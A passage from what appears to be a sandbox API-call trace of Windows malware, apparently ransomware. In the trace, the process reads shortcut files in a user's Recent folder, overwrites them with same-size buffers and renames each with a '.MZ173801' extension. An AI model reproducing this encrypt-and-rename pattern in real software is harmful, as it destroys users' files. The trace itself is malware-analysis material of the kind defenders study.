lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0106.637] GetCurrentThreadId () returned 0x1358 [0106.637] GetCurrentThreadId () returned 0x1358 [0106.637] GetCurrentThreadId () returned 0x1358 [0106.637] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4DBo0atmEpeC-LN5J.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\4dbo0atmepec-ln5j.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.637] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.637] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.637] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3e9 [0106.637] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.637] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3e9, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3e9, lpOverlapped=0x0) returned 1 [0106.638] CloseHandle (hObject=0x3f4) returned 1 [0106.638] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4DBo0atmEpeC-LN5J.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\4dbo0atmepec-ln5j.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.639] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3e9, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3e9, lpOverlapped=0x0) returned 1 [0106.640] CloseHandle (hObject=0x3f4) returned 1 [0106.641] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4DBo0atmEpeC-LN5J.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\4dbo0atmepec-ln5j.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4DBo0atmEpeC-LN5J.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\4dbo0atmepec-ln5j.lnk.mz173801")) returned 1 [0106.641] GetCurrentThreadId () returned 0x1358 [0106.641] GetCurrentThreadId () returned 0x1358 [0106.641] GetCurrentThreadId () returned 0x1358 [0106.641] GetCurrentThreadId () returned 0x1358 [0106.642] GetCurrentThreadId () returned 0x1358 [0106.642] GetCurrentThreadId () returned 0x1358 [0106.642] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6f686d, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea6f686d, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea6f686d, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="51xMNOj.flv.lnk", cAlternateFileName="51XMNO~1.LNK")) returned 1 [0106.642] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0106.642] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.642] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\51xMNOj.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\51xmnoj.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6f686d, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea6f686d, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea6f686d, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x458)) returned 1 [0106.642] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.642] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0106.643] GetCurrentThreadId () returned 0x1358 [0106.643] GetCurrentThreadId () returned 0x1358 [0106.643] GetCurrentThreadId () returned 0x1358 [0106.643] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.643] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0106.643] GetCurrentThreadId () returned 0x1358 [0106.643] GetCurrentThreadId () returned 0x1358 [0106.643] GetCurrentThreadId () returned 0x1358 [0106.643] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\51xMNOj.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\51xmnoj.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.644] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0106.644] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.644] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x458 [0106.644] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0106.644] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x458, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x458, lpOverlapped=0x0) returned 1 [0106.689] CloseHandle (hObject=0x3f4) returned 1 [0106.690] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\51xMNOj.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\51xmnoj.flv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0106.690] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x458, lpOverlapped=0x0) returned 1 [0106.691] CloseHandle (hObject=0x3f4) returned 1 [0106.692] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\51xMNOj.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\51xmnoj.flv.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\51xMNOj.flv.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\51xmnoj.flv.lnk.mz173801")) returned 1 [0106.693] GetCurrentThreadId () returned 0x1358 [0106.693] GetCurrentThreadId () returned 0x1358 [0106.693] GetCurrentThreadId () returned 0x1358 [0106.693] GetCurrentThreadId () returned 0x1358 [0106.693] GetCurrentThreadId () returned 0x1358 [0106.693] GetCurrentThreadId () returned 0x1358 [0106.693] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3d5659, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea3d5659, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea3d5659, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x52b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="5iO4NXS5B547.lnk", cAlternateFileName="5IO4NX~1.LNK")) returned 1 [0106.693] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0106.693] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0106.693] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5iO4NXS5B547.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\5io4nxs5b547.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3d5659, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea3d5659, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea3d5659, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x52b)) returned 1 [0106.694] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0106.694] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 